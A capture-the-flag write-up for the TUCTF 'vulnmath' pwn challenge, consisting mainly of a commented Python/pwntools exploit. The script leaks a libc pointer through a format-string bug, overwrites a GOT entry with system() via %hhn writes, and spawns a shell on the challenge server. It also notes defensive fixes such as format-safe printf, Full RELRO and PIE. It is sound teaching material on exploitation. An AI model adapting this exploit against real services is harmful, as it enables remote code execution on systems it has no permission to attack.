vulnmath
[pwn]
vulnmath
Enter the belly of the beast and emerge victorious. nc chal.tuctf.com 30502
Exploit
# Exploit for the TUCTF "vulnmath" pwn challenge (Python 2 / pwntools script).
#
# What the script shows about the target (as implied by the payloads below;
# the binary itself is not on this page):
#   * the service echoes user input through a printf-style format string --
#     the "%6$s" / "%6$hhn" directives below are interpreted by the target,
#     which is the classic uncontrolled-format-string weakness;
#   * a fixed 0x0804xxxx address space is assumed (non-PIE 32-bit ELF) and a
#     writable GOT (no Full RELRO), since a GOT slot is first read to leak a
#     libc pointer and then overwritten byte by byte.
# Defensive takeaways: never pass user data as the format argument
# (printf("%s", buf) instead of printf(buf)); build with
# -Wformat -Wformat-security (ideally -Werror=format-security), Full RELRO
# (-Wl,-z,relro,-z,now) so the GOT is read-only after load, and PIE so the
# addresses hard-coded below would have to be leaked first.
from pwn import *
import sys  # unused in this script
# Connects to the challenge service named in the task description.
c = remote("chal.tuctf.com", 30502)
# Address whose contents are leaked on the first round.  The later print
# labels it as printf's GOT entry -- assumed from the label, not verified here.
leak_addr = 0x0804c010
# Consume the first prompt; the returned banner is never used.
r = c.readuntil("\n> ")
# Round 1 (read primitive): the packed 4-byte address is placed at the start of
# the input and "%6$s" dereferences the 6th variadic argument as a C string.
# The script relies on the input buffer being at argument position 6 so that
# the address it just sent is what "%6$s" reads -- an assumption about the
# target's stack layout that is not visible on this page.
c.send(struct.pack("<L", leak_addr) + ".%6$s\n")
# Split the echo on the "." separator and take the 4 bytes after it as a
# little-endian pointer.  Fragile: a "." inside the leaked bytes, or a NUL
# within the first 4 bytes (which terminates %s output), breaks the unpack.
# `struct` here comes from pwntools' star import, not an explicit import.
got_printf = struct.unpack("<L", c.readuntil("\n> ").split(".")[1][0:4])[0]
print "print@libc: %08x" % got_printf
# theirs -- offsets for the challenge's libc build, supplied by the author;
# they cannot be derived from anything on this page and are libc-version
# specific.
libc_delta = 0x54230
system_delta = 0x458b0
# libc base = leaked printf address - printf's offset within that libc.
libc_base = got_printf - libc_delta
print "libc base : %08x" % libc_base
# Address that will be written into the GOT slot below.
libc_system = libc_base + system_delta
print "libc system: %08x" % libc_system
# The slot to overwrite: 4 bytes past leak_addr, labelled as free's GOT entry
# by the variable name (assumed, not verified here).
got_free = 0x0804c014
# Round 2 (write primitive): one byte per request via "%<width>c%6$hhn".
# %hhn stores the number of characters printed so far as a single byte, so
# each width is chosen to make that count equal one byte of libc_system.
# The "- 5" accounts for the 5 characters already printed before the padding
# (4-byte address + "."); only the low byte gets an extra 0x100, presumably to
# keep the width positive since %hhn truncates to 8 bits anyway.
# NOTE(review): n_b..n_d assume the respective byte of libc_system is >= 5;
# a smaller byte yields a negative width, which printf treats as a flag, not
# a count, so that write would be wrong.
n_a = 0x100 + ((libc_system & 0xff) - 5)
n_b = ((libc_system >> 8)& 0xff) - 5
n_c = ((libc_system >> 16) & 0xff) - 5
n_d = ((libc_system >> 24) & 0xff) - 5
# Each request targets got_free + i and is followed by reading the prompt so
# the next send is not interleaved with the previous reply.
c.send(struct.pack("<L", got_free + 0) + ".%" + str(n_a) + "c%6$hhn\n")
c.readuntil("\n> ")
c.send(struct.pack("<L", got_free + 1) + ".%" + str(n_b) + "c%6$hhn\n")
c.readuntil("\n> ")
c.send(struct.pack("<L", got_free + 2) + ".%" + str(n_c) + "c%6$hhn\n")
c.readuntil("\n> ")
c.send(struct.pack("<L", got_free + 3) + ".%" + str(n_d) + "c%6$hhn\n")
c.readuntil("\n> ")
# Final request: "sh" NUL-padded to 32 bytes.  Presumably this buffer is the
# argument the target later passes to the overwritten slot -- confirm against
# the binary; nothing on this page shows the call site.
c.send("sh" + "\x00"*30)
# Hand the session over to the operator.
c.interactive()